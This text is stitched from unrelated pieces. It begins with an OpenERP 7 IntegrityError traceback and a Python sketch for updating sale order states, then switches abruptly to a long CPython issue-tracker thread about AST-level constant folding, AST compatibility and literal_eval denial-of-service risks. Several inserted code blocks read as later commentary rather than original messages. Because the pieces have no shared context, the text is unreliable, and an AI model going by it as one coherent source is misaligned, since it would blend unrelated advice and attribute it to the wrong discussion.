2013-05-30 16:13:03,055 16600 ERROR teste28maio1458 openerp.netsvc: Integrity Error
The operation cannot be completed, probably due to the following:
- deletion: you may be trying to delete a record while other records still reference it
- creation/update: a mandatory field is not correctly set
[object with reference: state - state]
Traceback (most recent call last):
  File "/opt/openerp-7.0/openerp/netsvc.py", line 289, in dispatch_rpc
    result = ExportService.getService(service_name).dispatch(method, params)
  File "/opt/openerp-7.0/openerp/service/web_services.py", line 614, in dispatch
    res = fn(db, uid, *params)
  File "/opt/openerp-7.0/openerp/osv/osv.py", line 169, in execute_kw
    return self.execute(db, uid, obj, method, *args, **kw or {})
  File "/opt/openerp-7.0/openerp/osv/osv.py", line 153, in wrapper
    netsvc.abort_response(1, _('Integrity Error'), 'warning', msg)
  File "/opt/openerp-7.0/openerp/netsvc.py", line 72, in abort_response
    raise openerp.osv.osv.except_osv(description, details)
except_osv: ('Integrity Error', 'The operation cannot be completed, probably due to the following:\n- deletion: you may be trying to delete a record while other records still reference it\n- creation/update: a mandatory field is not correctly set\n\n[object with reference: state - state]')
```
Thanks
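A note on the Python attempt above: one likely culprit is calling write() on a browse record with the cr/uid arguments; in the OpenERP 7 old API, write() is usually called on the model with a list of ids. Below is a rough, untested sketch of that pattern. The field name asd_pquotation_id and the state values are taken from the question; the Record/Model classes are test scaffolding standing in for the real ORM (real code would use self.pool.get('sale.order')):

```python
class Record(dict):
    """Tiny stand-in for an OpenERP 7 browse record (test scaffolding only)."""
    __getattr__ = dict.__getitem__

class Model:
    """Tiny stand-in for an osv model exposing the old cr/uid-style API."""
    def __init__(self, records):
        self.records = records  # id -> Record
        self.pool = None        # wired up below
    def browse(self, cr, uid, ids, context=None):
        return [self.records[i] for i in ids]
    def write(self, cr, uid, ids, vals, context=None):
        for i in ids:
            self.records[i].update(vals)
        return True

def contracts_received(self, cr, uid, ids, context=None):
    """Set the linked sale order to 'waitingdocs', then this PO to 'received'."""
    sale_obj = self.pool['sale.order']
    for po in self.browse(cr, uid, ids, context=context):
        if po.asd_pquotation_id:  # assumed many2one to the sale order
            sale_obj.write(cr, uid, [po.asd_pquotation_id.id],
                           {'state': 'waitingdocs'}, context=context)
    return self.write(cr, uid, ids, {'state': 'received'}, context=context)

# Toy run: purchase order 1 references sale order 7.
so = Model({7: Record(id=7, state='draft')})
po = Model({1: Record(id=1, state='sent', asd_pquotation_id=Record(id=7))})
po.pool = {'sale.order': so}
contracts_received(po, None, 1, [1])
```

The key differences from the original attempt: write() is invoked on the sale.order model with [id], not on a browse record, and the method iterates over the browsed purchase orders instead of assuming a value in the context.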
Created on 2011-03-15 04:46 by eltoder, last changed 2017-03-15 06:45 by mbdevpl.
As pointed out by Raymond, constant folding should be done on AST rather than on generated bytecode. Here's a patch to do that. It's rather long, so overview first.
The patch replaces existing peephole pass with a folding pass on AST and a few changes in compiler. Feature-wise it should be on par with old peepholer, applying optimizations more consistently and thoroughly, but maybe missing some others. It passes all peepholer tests (though they seem not very extensive) and 'make test', but more testing is, of course, needed.
I've split it in 5 pieces for easier reviewing, but these are not 5 separate patches, they should all be applied together. I can upload it somewhere for review or split it in other ways, let me know. Also, patches are versus 1e00b161f5f5, I will redo against head.
TOC:
1. Changes to AST
2. Folding pass
3. Changes to compiler
4. Generated files (since they're checked in)
5. Tests
In detail:
1. I needed to make some changes to the AST to enable constant folding. These are outlined below. For example:
def foo():
"doc" + "string"
Without optimizations foo doesn't have a docstring. After folding, however, the first statement in foo is a string literal. This means that the docstring depends on the level of optimizations. Making it an attribute avoids this problem.
2. Constant folding (and a couple of other tweaks) is performed by a visitor. The visitor is auto-generated from ASDL and a C template. C template (Python/ast_opt.ct) provides code for optimizations and rules on how to call it. Parser/asdl_ct.py takes this and ASDL and generates a visitor, that visits only nodes which have associated rules (but visits them via all paths).
The code for optimizations itself is pretty straight-forward.
The generator can probably be used for symtable.c too, removing ~200 tedious lines of code.
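The patch's visitor is generated C working on CPython's internal AST, but the general shape of an AST constant-folding pass can be sketched at the Python level with ast.NodeTransformer. This is purely illustrative and folds only Add on constants:

```python
import ast

class ConstantFolder(ast.NodeTransformer):
    """Fold BinOp(Add) nodes whose operands are both constants."""
    def visit_BinOp(self, node):
        self.generic_visit(node)  # fold children first (bottom-up)
        if (isinstance(node.left, ast.Constant) and
                isinstance(node.right, ast.Constant) and
                isinstance(node.op, ast.Add)):
            try:
                value = node.left.value + node.right.value
            except TypeError:
                return node  # leave invalid operations for runtime
            return ast.copy_location(ast.Constant(value), node)
        return node

def fold(source):
    """Parse, fold, compile and evaluate a single expression."""
    tree = ConstantFolder().visit(ast.parse(source, mode="eval"))
    ast.fix_missing_locations(tree)
    return eval(compile(tree, "<folded>", "eval"))
```

Because folding runs bottom-up, nested expressions like 1 + 2 + 3 collapse in stages, and string concatenation such as 'doc' + 'string' folds the same way, which is exactly the docstring case discussed above.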
3. Changes to compiler are in 3 categories
a) Updates for AST changes.
b) Changes to generate better code and not need any optimizations. This includes tuple unpacking optimization and if/while conditions.
c) Simple peephole pass on compiler internal structures. This is a better form for doing this, than a bytecode. The pass only deals with jumps to jumps/returns and trivial dead code.
I've also made 'raise' recognized as a terminator, so that 'return None' is not inserted after it.
4, 5. No big surprises here.
I'm confused. Why aren't there review links?
Because I don't know how to make them. Any pointers?
> Because I don't know how to make them. Any pointers?
Martin is hacking on the tool these days... So it's no surprise it
doesn't work perfectly yet ;)
If you have a Google account you can upload these patches to, though.
Thanks. Review link:
The review links didn't come up automatically because 336137a359ae isn't a hg.python.org/cpython revision ID.
I see. Should I attach diffs vs. some revision from hg.python.org?
No need, since you manually created a review on appspot. The local Reitveld links are just a convenience that can avoid the need to manually create a review instance.
Any comments on the code so far or suggestions on how we should move forward?
I've been focusing on softer targets during the sprints - I'll dig into this once I'm back home and using my desktop machine again.
I've updated patches on Rietveld with some small changes. This includes better code generation for boolops used outside of conditions and cleaned up optimize_jumps(). This is probably the last change before I get some feedback.
Also, I forgot to mention yesterday, patches on Rietveld are vs. ab45c4d0b6ef
Just for fun I've run pystones. W/o my changes it averages to about 70k, with my changes to about 72.5k.
A couple of somewhat related issues:
#10399 AST Optimization: inlining of function calls
#1346238 A constant folding optimization pass for the AST
Obviously, ast optimizers should work together and not duplicate.
Nice to see increased attention.
AFAICT my patch has everything that #1346238 has, except BoolOps, which can be easily added (there's a TODO). I don't want to add any new code, though, until the current patch will get reviewed -- adding code will only make reviewing harder.
#10399 looks interesting, I will take a look.
Is anyone looking or planing to look at the patch?
I suspect someone will sometime. There is bit of a backlog of older issues.
Finally got around to reviewing this (just a visual scan at this stage) - thanks for the effort. These are mostly "big picture" type comments, so I'm keeping them here rather than burying them amongst all the details in the code review tool.
The effect that collapsing Num/Str/Bytes into a single Lit node type has on ast.literal_eval bothered me initially, but looking more closely, I think those changes will actually improve the function (string concatenation will now work, and errors like "'hello' - 'world'" should give a more informative TypeError). (Bikeshed: We use Attribute rather than Attr for that node type, perhaps the full "Literal" name would be better, too)
Lib/test/disutil.py should really be made a feature of the dis module itself, by creating an inner disassembly function that returns a string, then making the existing "dis" and "disassembly" functions print that string (i.e. similar to what I already did in making dis.show_code() a thin wrapper around the new dis.code_info() function in 3.2). In the absence of a better name, "dis_to_str" would do.
Since the disassembly is interpreter specific, the new disassembly tests really shouldn't go directly in test_compile.py. A separate "test_ast_optimiser" file would be easier for alternate implementations to skip over. A less fragile testing strategy may also be to use the ast.PyCF_ONLY_AST flag and check the generated AST rather than the generated bytecode.
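That testing strategy can be shown in a couple of lines; this minimal illustration (not from the patch) asks compile() for the tree instead of a code object and inspects node types directly:

```python
import ast

source = "x = 'doc' + 'string'"
# PyCF_ONLY_AST makes compile() return the AST rather than bytecode,
# so tests can assert on tree structure instead of fragile disassembly.
tree = compile(source, "<test>", "exec", ast.PyCF_ONLY_AST)
assign = tree.body[0]
```

Tests written this way survive bytecode-level changes between interpreter versions, since they only depend on the shape of the tree.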
I'd like to see a written explanation for the first few changes in test_peepholer.py. Are those cases no longer optimised? Are they optimised differently? Why did these test cases have to change? (The later changes in that file look OK, since they seem to just be updating tests to handle the more comprehensive optimisation)
When you get around to rebasing the patch on 3.3 trunk, don't forget to drop any unneeded "from __future__" imports.
The generated code for the Lit node type looks wrong: it sets v to Py_None, then immediately checks to see if v is NULL again.
Don't use "string" as a C type - use "char *" (and "char **" instead of "string *").
There should be a new compiler flag to skip the AST optimisation step.
A bunch of the compiler internal changes seem to make the basic flow of the generated assembly not match the incoming source code.
I think the biggest thing to take out of my review is that I strongly encourage deferring the changes for 5(b) and 5(c).
I like the basic idea of using a template-based approach to try to get rid of a lot of the boilerplate code currently needed for AST visitors.
Providing a hook for optimisation in Python (as Dave Malcolm's approach does) is valuable as well, but I don't think the two ideas need to be mutually exclusive.
As a more general policy question... where do we stand in regards to backwards compatibility of the AST? The ast module docs don't have any caveats to say that it may change between versions, but it obviously *can* change due to new language constructs (if nothing else).
>?
I would provide this via another compile flag a la PyCF_ONLY_AST. If you give only this flag, you get the original AST. If you give (e.g.)
PyCF_OPTIMIZED_AST, you get the resulting AST after the optimization stage (or the same, if optimization has been disabled).
Thanks.
> string concatenation will now work, and errors like "'hello' - 'world'"
> should give a more informative TypeError
Yes, 'x'*5 works too.
> Bikeshed: We use Attribute rather than Attr for that node type,
> perhaps the full "Literal" name would be better
Lit seemed more in line with Num, Str, BinOp etc. No reason it can't be changed, of course.
> Lib/test/disutil.py should really be made a feature of the dis module
> itself
Agreed, but I didn't want to widen the scope of the patch. If this is something that can be reviewed quickly, I can make a change to dis. I'd add a keyword-only arg to dis and disassembly -- an output stream defaulting to stdout. dis_to_str then passes StringIO and returns the string. Sounds OK?
> Since the disassembly is interpreter specific, the new disassembly
> tests really shouldn't go directly in test_compile.py. A separate
> "test_ast_optimiser" file would be easier for alternate
> implementations to skip over.
New tests in test_compiler are not for the AST pass, but for changes to compile.c. I can split them out, how about test_compiler_opts?
> I'd like to see a written explanation for the first few changes in
> test_peepholer.py
Sure.
1) not x == 2 can be theoretically optimized to x != 2, while this test is for another optimization. not x is more robust.
2) Expression statement which is just a literal doesn't produce any code at all. This is now true for None/True/False as well. To preserve constants in the output I've put them in tuples.
> When you get around to rebasing the patch on 3.3 trunk, don't forget
> to drop any unneeded "from __future__" imports.
If you're referring to asdl_ct.py, that's actually an interesting question. asdl_ct.py is run by system installed python2, for obvious reasons. What is the policy here -- what is the minimum version of system python that should be sufficient to build python3? I tested my code on 2.6 and 3.1, and with __future__ it should work on 2.5 as well. Is this OK or should I drop 'with' so it runs on 2.4?
> The generated code for the Lit node type looks wrong: it sets v to
> Py_None, then immediately checks to see if v is NULL again.
Right, comment in asdl_c.py says:
# XXX: special hack for Lit. Lit value can be None and it
# should be stored as Py_None, not as NULL.
If there's a general agreement on Lit I can certainly clean this up.
> Don't use "string" as a C type - use "char *" (and "char **" instead
> of "string *").
string is a typedef for PyObject that ASDL uses. I don't think I have a choice not to use it. Can you point to a specific place where char* could be used?
> There should be a new compiler flag to skip the AST optimisation step.
There's already an 'optimizations level' flag. Maybe we should make it more meaningful rather than multiplying the number of flags?
> A bunch of the compiler internal changes seem to make the basic flow
> of the generated assembly not match the incoming source code.
Can you give an example of what you mean?
The changes are basically 1) standard way of handling conditions in simple compilers 2) peephole.
The reason why I think it makes sense to have this in a single change is testing. This allows reusing all the existing peephole tests. If I leave the old peephole pass enabled, there's no way to tell from the disassembly whether my pass did anything. I can port the tests to AST, but that seemed like more work than matching the old peephole optimizations.
Is there any opposition to doing simple optimizations on compiler structures? They seem a good fit for the job. In fact, if not for the stack representation, I'd say they are a better IR for an optimizer than the AST.
Also, can I get your opinion on making None/True/False into literals early on and getting rid of forbidden_name?
Antoine, Georg -- I think Nick's question is not about AST changing after optimizations (this can indeed be a separate flag), but the structure of AST changing. E.g. collapsing of Num/Str/Bytes into Lit.
Btw, if this is acceptable I'd make a couple more changes to make scope structure obvious from AST. This will allow auto-generating much of the symtable pass.
> and with __future__ it should work on 2.5 as well.
Actually, it seems that str.format at least is not in 2.5 either. Still, the question is: should I make it run on 2.5 or 2.4, or is 2.6 OK (in which case __future__ can be removed)?
> not x == 2 can be theoretically optimized to x != 2, ...
I don't think it can:
>>> class X:
... def __eq__(self, other):
... return True
... def __ne__(self, other):
... return True
...
>>> x = X()
>>>
>>> not x == 2
False
>>> x != 2
True
>>>
> I don't think it can:
That already doesn't work in dict and set (eq not consistent with hash), I don't think it's a big problem if that stops working in some other cases. Anyway, I said "theoretically" -- maybe after some conservative type inference.
Also, to avoid any confusion -- currently my patch only runs AST optimizations before code generation, so compile() with ast.PyCF_ONLY_AST returns non-optimized AST.
While I would not be happy to use class X above, the 3.2 manual explicitly says "There are no implied relationships among the comparison operators. The truth of x==y does not imply that x!=y is false."
OK, I missed the fact that the new optimisation pass isn't run under PyCF_ONLY_AST.
However, as Eugene picked up, my concern is actually with the collapsing of Str/Num/Bytes/Ellipsis into the new Lit node, and the changes to the way None/True/False are handled. They're all changes that *make sense*, but would also likely cause a variety of AST manipulations to break. We definitely don't care when bytecode hacks break, but providing the ast module means that AST manipulation is officially supported.
However, the reason I bring up new constructs is that new constructs may break AST manipulation passes even if the old structures are left intact - the AST visitor may miss (or misinterpret) things because it doesn't understand the meaning of the new nodes.
We may need to take this one back to python-dev (and get input from the other implementations as well). It's a fairly fundamental question when it comes to the structure of any changes.
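A minimal illustration of that concern, using the present-day ast module: AST consumers typically dispatch on concrete node classes, and the class emitted for the same source has in fact varied across Python versions (Num in older releases, Constant in newer ones), just as the proposed Lit node would have changed it.

```python
import ast

# AST consumers commonly check concrete node classes; a renamed or collapsed
# node type (Num/Str -> Lit, or later Constant) silently stops matching
# such checks even though the source code is unchanged.
node = ast.parse("42").body[0].value
print(type(node).__name__)  # 'Num' on old Pythons, 'Constant' on new ones
assert type(node).__name__ in {"Num", "Constant"}
```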
If we have to preserve backward compatibility of Python AST API, we can do this relatively easily (at the expense of some code complexity):
* Add 'version' argument to compile() and ast.parse() with default value of 1 (old AST). Value 2 will correspond to the new AST.
* Do not remove Num/Str/Bytes/Ellipsis Python classes. Make PyAST_obj2mod and PyAST_mod2obj do appropriate conversions when version is 1.
* Possibly emit a PendingDeprecationWarning when version 1 is used with the goal of removing it in 3.5
Alternative implementation is to leave Num/Str/etc classes in C as well, and write visitors (similar to folding one) to convert AST between old and new forms.
Does this sound reasonable? Should this be posted to python-dev? Should I write a PEP (I'd need some help with this)?
Are there any other big issues preventing this from being merged?
Eugene, I think you're doing great work here and would like to see you succeed. In the near term, I don't have time to participate, but don't let that stop you.
Is there any tool to see how it works step by step? This whole thing is extremely interesting, but I can't fit all the details of AST processing in my head.
Eugene: I suggest raising the question on python-dev. The answer potentially affects the PEP 380 patch as well (which adds a new attribute to the "Yield" node).
Anatoly: If you just want to get a feel for the kind of AST various pieces of code produce, then the "ast.dump" function (along with using the ast.PyCF_ONLY_AST flag in compile) may be enough.
You may also want to take a look at the AST -> dot file conversion code in Dave Malcolm's patches on #10399.
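For a concrete starting point, the suggestion above can be tried in a few lines; everything here is standard ast module API:

```python
import ast

# Compile source to an AST instead of bytecode, then dump its structure --
# the quickest way to get a feel for the nodes a piece of code produces.
tree = compile("x = 1 + 2", "<example>", "exec", ast.PyCF_ONLY_AST)
print(ast.dump(tree))  # a Module containing an Assign whose value is a BinOp
```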
Eugene raised the question of AST changes on python-dev [1] and the verdict was that so long as ast.__version__ is updated, AST clients will be able to cope with changes.
Benjamin Peterson made some subsequent changes to the AST (bringing the AST for try and with statements more in line with the concrete syntax, allowing source-to-source transforms to retain the original code structure).
This patch will probably need to be updated to be based on the latest version of the AST - I would be surprised if it applied cleanly to the current tip.
[1]
Updated the title to reflect that the peephole optimizer will likely continue to exist, but in a much simpler form. Some complex peephole optimizations such as constant folding can be handled more easily and more robustly at the AST level.
Other minor peephole optimizations such as jump-to-jump simplification are still bytecode-level optimizations (ones that improve the quality of the generated code without visibility into higher-level semantics).
Nick, if there's interest in reviewing the patch I can update it. I doubt it needs a lot of changes, given that the visitor is auto-generated.
Raymond, the patch contains a rewrite of low-level optimizations to work before byte code generation, which simplifies them a great deal.
As Raymond noted though, some of the block stack fiddling doesn't make sense until after the bytecode has already been generated. It's OK to have multiple optimisers at different layers, each taking care of the elements that are best suited to that level.
And yes, an updated patch against the current tip would be good. Of my earlier review comments, the ones I'd still like to see addressed are:
- finish clearing out the now redundant special casing of None/True/False
- separating out the non-AST related compiler tweaks (i.e. 3b and 3c and the associated test changes) into their own patch (including moving the relevant tests into a separate @cpython_only test case)
I'm still not 100% convinced on that latter set of changes, but I don't
want my further pondering on those to hold up the rest of the patch. (they probably make sense, it's just that the AST level changes are much easier to review than the ones right down at the bytecode generation level - reviewing the latter means getting back up to speed on precisely how the block stack works and it will be a while before I get around to doing that. It's just one of those things where the details matter, but diving that deep into the compiler is such a rare occurrence that I have to give myself a refresher course each time it happens).
Marking the PEP 380 implementation as a dependency, as I expect it to be easier to update this patch to cope with those changes than it would be the other way around.
Bumping the target version to 3.4.
This is still a good long term idea, but it's a substantial enough change that we really want to land it early in a development cycle so we have plenty of time to hammer out any issues.
Good call, Nick.
In msg132312 Nick asked "where do we stand in regards to backwards compatibility of the AST?"
The current ast module chapter, second sentence, says "The abstract syntax itself might change with each Python release; this module helps to find out programmatically what the current grammar looks like."
where 'current grammar' is copied in 30.2.2. Abstract Grammar.
I do not know when that was written, but it clearly implies that the grammar, which defines the node classes, is x.y version specific. I think this is the correct policy, just so we can make changes (hopefully improvements) such as the one proposed here.
I'm working on an AST optimizer for Python 2.6-3.3:
It is implemented in Python and is able to optimize many more cases than the current bytecode peepholer.
All of the optimisations that assume globals haven't been shadowed or rebound are invalid in the general case.
E.g. print(1.5) and print("1.5") are valid for *our* print function, but we technically have no idea if they're equivalent in user code.
In short, if it involves a name lookup and that name isn't reserved to the compiler (e.g. __debug__) then no, you're not allowed to optimise it at compile time if you wish to remain compliant with the language spec. Method calls on literals are always fair game, though (e.g. you could optimise "a b c".split())
Any stdlib AST optimiser would need to be substantially more conservative by default.
> All of the optimisations that assume globals haven't been shadowed
> or rebound are invalid in the general case.
My main idea is that the developer of the application should be able to annotate functions and constants to declare them as "optimizable" (constant). I chose to assume that builtins are not overridden, but if that breaks applications, it can be converted to an option disabled by default.
There is a known issue: test_math fails because pow() is an alias to math.pow() in doctests. The problem is that "from math import *" is called and the result is stored in a namespace, and then "pow(2,4)" is called in that namespace. astoptimizer doesn't detect that pow=math.pow because locals are only set when the code is executed (and not at compilation) with something like exec(code, namespace). It is a limitation of the optimizer. A workaround is to disable optimizations when running the tests.
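The limitation can be sketched in a few lines: the binding of pow only exists once the namespace is populated at run time, so a compile-time pass has no way to see it.

```python
# At compile time nothing distinguishes this "pow" from the builtin; only
# executing the import binds the name to math.pow inside the namespace.
ns = {}
exec("from math import *", ns)

result = eval("pow(2, 4)", ns)
print(result)  # 16.0 -- math.pow returns a float
assert isinstance(result, float)
assert isinstance(pow(2, 4), int)  # the builtin returns an int
```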
It is possible to detect that builtins are shadowed (ex: print=myprint). astoptimizer has experimental support for assignments, but it only works on trivial examples so far (like "x=1; print(x)") and is disabled by default (because it is buggy). I also plan to disable some optimizations if globals(), vars() or dir() is called.
> Any stdlib AST optimiser would need to be substantially more conservative by default.
FYI The test suite of Python 2.7 and 3.3 pass with astoptimizer... except some "minor" (?) failures:
* test_math fails for the reason explained above
* test_pdb: it looks to be an issue with line number (debuggers don't like optimizers :-))
* test_xml_etree and test_xml_etree_c: reference count of the None singleton
The test suite helped me to find bugs in my optimizer :-)
I also had to add some hacks (hasattr) for test_ast (test_ast generates invalid AST trees). The configuration should also be adapted for test_peepholer, because CPython peepholer uses a limit of 20 items, whereas astoptimizer uses a limit of 4096 bytes/characters for string by default. All these minor nits are now handled in a specific "cpython_tests" config.
No, you're assuming global program analysis and *that is not a valid assumption*.
One of the key features of Python is that *monkeypatching works*. It's not encouraged, but it works.
You simply cannot play games with name lookups like this without creating something that is no longer Python.
You also have to be very careful of the interface to tracing functions, such as profilers and coverage analysis tools.
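The monkeypatching point can be demonstrated concretely: folding print(1.5) into print("1.5") is observable from pure Python, so it would change program behaviour.

```python
import builtins

# Rebind print and record the argument types it receives.
calls = []
def recording_print(arg):
    calls.append(type(arg).__name__)

original = builtins.print
builtins.print = recording_print
try:
    print(1.5)    # the replacement sees a float
    print("1.5")  # ...and here a str: the two calls are distinguishable
finally:
    builtins.print = original

assert calls == ["float", "str"]
```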
> Method calls on literals are always fair game, though (e.g. you could optimise "a b c".split())
What about optimizations that do not change behavior, except for different error messages? E.g. we can change
y = [1,2][x]
to
y = (1,2)[x]
where the tuple is constant and is stored in co_consts. This will, however, produce a different text in the exception when x is not 0 or 1. The type of exception is going to be the same.
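A quick check of that claim: both versions raise IndexError for an out-of-range index, with only the message text differing.

```python
def from_list(x):
    return [1, 2][x]   # list built at run time

def from_tuple(x):
    return (1, 2)[x]   # tuple can live in co_consts

assert from_list(1) == from_tuple(1) == 2

try:
    from_list(5)
except IndexError as exc:
    list_msg = str(exc)    # 'list index out of range'

try:
    from_tuple(5)
except IndexError as exc:
    tuple_msg = str(exc)   # 'tuple index out of range'

assert list_msg != tuple_msg  # same exception type, different text
```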
The peephole optimiser already makes optimisations like that in a couple of places (e.g. set -> frozenset):
>>> def f(x):
... if x in {1, 2}: pass
...
>>> f.__code__.co_consts
(None, 1, 2, frozenset({1, 2}))
It's name lookup semantics that are the real minefield. It's one of the reasons PyPy's JIT can be so much more effective than a static optimiser - because it's monitoring real execution and inserting the appropriate guards it's not relying on invalid assumptions about name bindings.
If I'm not missing something, changing
x in [1,2]
to
x in (1,2)
and
x in {1,2}
to
x in frozenset([1,2])
does not change any error messages.
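Checking one corner of that: for these literals, the only runtime error a membership test can raise comes from hashing the left operand, and that error is identical for a set literal and a frozenset constant.

```python
x = []  # unhashable, so the membership test must raise TypeError

try:
    x in {1, 2}
except TypeError as exc:
    set_msg = str(exc)

try:
    x in frozenset([1, 2])
except TypeError as exc:
    frozenset_msg = str(exc)

assert set_msg == frozenset_msg  # same error either way
```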
Agreed that without dynamic compilation we can pretty much only track literals (including functions and lambdas) assigned to local variables. might also play into this if it happens to go in.
Just noting for the record (since it appears it was never brought back to the comments): it is expected that programs that manipulate the AST may require updates before they will work on a new version of Python. Preserving AST backwards compatibility is too limiting to the evolution of the language, so only source compatibility is promised.
(That was the outcome of the suggested AST discussions on python-dev that were mentioned earlier)
Regenerated for review.
"issue11549.patch: serhiy.storchaka, 2016-05-11 08:22: Regenerated for review"
diff -r 1e00b161f5f5 PC/os2emx/python33.def
--- a/PC/os2emx/python33.def Wed Mar 09 12:53:30 2011 +0100
+++ b/PC/os2emx/python33.def Wed May 11 11:21:24 2016 +0300
The revision 1e00b161f5f5 is 4 years old. The patch looks very outdated :-/
Fairly sure it's 5 years old.
Yes, the patch is outdated, conflicts with the current code (and would conflict even more after pushing the wordcode patch) and contains bugs. But it moved in the right direction. I think your _PyCode_ConstantKey() could help to fix the bugs. I'm going to revive this issue.
Serhiy: Nice! Yes, _PyCode_ConstantKey solved the problem.
But #16619 went in the opposite direction of this patch, and introduced a new type of literal node instead of unifying the existing ones. Kind of a shame, since *this* patch, I believe, both fixes that bug and removes the unreachable code in the example :)
I also see that Victor has been doing some of the same work, e.g. #26146.
> I also see that Victor has been doing some of the same work, e.g. #26146.
The ast.Constant idea comes directly from your work. The implementation may be different.
It's a first step for AST optimizers.
@haypo, what do you think about ast.Lit and ast.Constant?
Is this patch updated to use ast.Constant?
Or should ast.Constant be used only for some transforms like constant folding?
Hugo Geoffroy added the comment:
Since the Python compiler doesn't produce ast.Constant, there is no
change in practice in ast.literal_eval(). If you found a bug, please
open a new issue.
> At least [this library]() would have a serious risk of remote DoS :
I tried hard to implement a sandbox in Python and I failed:
I don't think that literal_eval() is safe *by design*.
Good point, Hugo. Yes, this should be taken into account when moving constant folding to the AST level. Thank you for the reminder.
> Since the Python compiler doesn't produce ast.Constant, there is no
change in practice in ast.literal_eval(). If you found a bug, please
open a new issue.
Currently there is no bug in ast.literal_eval() because the '**' operator is not accepted.
>>> ast.literal_eval("2**2**32")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/serhiy/py/cpython/Lib/ast.py", line 85, in literal_eval
return _convert(node_or_string)
File "/home/serhiy/py/cpython/Lib/ast.py", line 84, in _convert
raise ValueError('malformed node or string: ' + repr(node))
ValueError: malformed node or string: <_ast.BinOp object at 0xb6f2fa4c>
But if we move the optimization to the AST level, this can add a vulnerability to DoS attacks. The optimizer should do additional checks before executing operators that can return too large a value or take too much CPU time. Currently this vulnerability exists in the peephole optimizer.
> Currently there is no a bug in ast.literal_eval() because the '**' operator is not accepted.
The doc says "This can be used for safely evaluating strings containing Python values from untrusted sources without the need to parse the values oneself. It is not capable of evaluating arbitrarily complex expressions, for example involving operators or indexing."
I don't think that it's a bug, but a deliberate design choice. a**b is an obvious trick to DoS a server (high CPU and memory usage).
Hugo, Serhiy, and Victor: I think you're all agreeing with each other, but to make sure I'm understanding the point correctly:
1. ast.literal_eval() is currently safe from malicious code like "100000 ** 100000" or "1073741824 * 'a'" because it only traverses addition and subtraction nodes, so any such operations will just throw ValueError (As a point of interest: unary plus and minus are required to support positive and negative numeric literals, while binary addition and subtraction are required to support complex number literals. So the status quo isn't precisely the result of a conscious security decision, it's just a minimalist implementation of exactly what's necessary to support all of the builtin types, which also provides some highly desirable security properties when evaluating untrusted code)
2. an eager constant folding optimisation in the AST tier would happen *before* literal_eval filtered out the multiplication and exponentiation nodes, and hence would make literal_eval vulnerable to remote DOS attacks in cases where it is expected to be safe
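Point 1 can be verified with the current ast module: the unary and binary +/- support exists exactly for numeric and complex literals, while anything like exponentiation is rejected before evaluation.

```python
import ast

assert ast.literal_eval("-1") == -1          # unary minus: negative literals
assert ast.literal_eval("1+2j") == 1 + 2j    # binary add: complex literals

blocked = False
try:
    ast.literal_eval("2**2**32")  # would be a memory/CPU bomb if evaluated
except ValueError:
    blocked = True
assert blocked
```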
However, that's not exactly how this patch works: if you pass "PyCF_ONLY_AST" as ast.parse does, it *doesn't* run the constant-folding step. Instead, the constant folding is run as an AST-to-AST transform during the AST-to-bytecode compilation step, *not* the initial source-to-AST step. (see )
This has a few nice properties:
- ast.literal_eval() remains safe
- source -> AST -> source transformation pipelines continue to preserve the original code structure
- externally generated AST structures still benefit from the AST optimisation pass
- we don't need a new flag to turn this optimisation pass off when generating the AST for a given piece of source code
> 1. Changes to AST
I'm working on updating this part. There are still some failing tests.
But I doubt this stage is worth the effort for now.
We already have Constant and NameConstant. So it seems there is no need for
None, Bool, TupleConst, SetConst nodes.
I think converting Num, Str, Bytes, Ellipsis into Constant in folding stage
is easier than fixing all tests.
Isn't taking the docstring before constant folding enough?
(I'm sorry if I'm wrong; I haven't tried it.)
They are all NameConstant already.
> We have already Constant and NameConstant. So it seems there are no need for
> None, Bool, TupleConst, SetConst nodes.
Yes, Constant is Victor's version of Lit.
> I think converting Num, Str, Bytes, Ellipsis into Constant in folding stage
> is easier than fixing all tests.
Fixing tests was fairly easy the last time. I think the question is what changes to the public API of AST are acceptable.
> They are all NameConstant already.
Keep in mind this patch is 6 years old :)
>> We have already Constant and NameConstant. So it seems there are no need for
>> None, Bool, TupleConst, SetConst nodes.
> Yes, Constant is Victor's version of Lit.
Then, may I remove ast.Lit, and use Constant and NameConstant?
>> I think converting Num, Str, Bytes, Ellipsis into Constant in folding stage
>> is easier than fixing all tests.
> Fixing tests was fairly easy the last time. I think the question is what changes to the public API of AST are acceptable.
I think backward compatibility is not guaranteed.
But there are some usages of ast. ( )
So I think we should make the change as small as possible.
OK.
>> They are all NameConstant already.
> Keep in mind this patch is 6 years old :)
I know. I want to move this patch forward, but I'm not a frontend (parser, AST, and compiler) expert.
I can't make design decisions without expert advice. Thanks for your reply.
Then, may I update the patch in following direction?
* Remove ast.Lit.
* Keep docstring change.
If you would like to implement constant folding at the AST level, I suggest you look at my fatoptimizer project:
The tricky part is to avoid operations when we know that it will raise an
exception or create an object too big according to our constraints.
I would prefer to implement an AST optimizer in Python, but converting C
structures to Python objects and then back to C structures has a cost. I'm
not sure that my optimizer implemented in Python is fast enough.
By the way, an idea would be to skip all optimizations in some cases like
for script.py when running python3 script.py.
Before trying advanced optimizations, I want to move the suspended obvious optimizations forward.
For example, removing unused constants is suspended because constant folding should be moved from the peephole pass to the AST. This is why I found this issue.
After that, I'm thinking about shrinking the stack size. frame_dealloc (which scans the whole stack) is one of the hot functions.
Dropping ast.Lit is fine. As for the docstring part, I'm torn. Yes it's nice as that will show up semantically in the Python code, but it's also easy to check for by just looking if the first statement is a Str (or Constant if that's what we make all strings). So I'll say I'm +0 on the docstring part.
At the AST level, you have a wide range of possible optimizations. See the optimizations that I implemented in fatoptimizer (FAT Python) to have an idea:
FAT Python adds guards checked at runtime, something not possible (not wanted) here.
But if you start with constant folding, why not implement constant propagation as well? What about loop unrolling?
Where is the limit? If you implement the AST optimizer in C, the limit will probably be your C skills and your motivation :-) In Python, the limit is more the Python semantics, which is... hum... not well defined. For example, does it break the Python semantics to replace [i for i in (1, 2, 3)] with [1, 2, 3]?
What if you use a debugger? Do you expect a list comprehension or a literal list?
FYI I suspended my work on FAT Python because almost no other core developer was interested. I didn't get any support, whereas I need support to push core FAT Python features like function specialization and runtime checks (PEP 510, see also PEP 511). Moreover, I failed to show any significant speedup on non-trivial functions. I abandoned before investigating function inlining, even if FAT Python already has a basic support for function inlining.
This issue is open since 2011. The question is always the same: is it worth it?
An alternative is to experiment an AST optimizer outside CPython and come back later with more data to drive the design of such optimizer. With FAT Python, I chose to add hooks in the Python compiler, but different people told me that it's possible to do that without such hook but importlib (importlib hooks).
What do you think Naoki?
